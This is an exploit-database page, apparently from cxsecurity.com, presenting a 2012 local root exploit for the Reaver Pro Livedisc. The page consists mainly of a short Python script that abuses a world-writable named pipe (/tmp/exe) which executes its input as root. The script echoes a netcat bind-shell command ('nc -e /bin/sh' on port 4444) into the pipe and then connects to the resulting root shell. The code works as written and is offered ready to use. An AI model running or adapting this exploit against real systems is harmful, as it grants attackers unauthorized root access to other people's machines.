Reaver Pro Livedisc Code Execution

2012.10.01
Credit: infodox
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python import os print """ Reaver Pro Local Root Exploits a hilarious named pipe flaw. The named pipe /tmp/exe is open to anyone... Any command echoed into it gets ran as root. This simply launches a bindshell on 4444... Insecurety Research | insecurety.net """ print "" print "This is why TacNetSol should hire me?" print "[+] Sending command to named pipe..." cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe''' os.system(cmd) print "[+] Connecting to bind shell, enjoy root!" os.system("nc -v localhost 4444")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top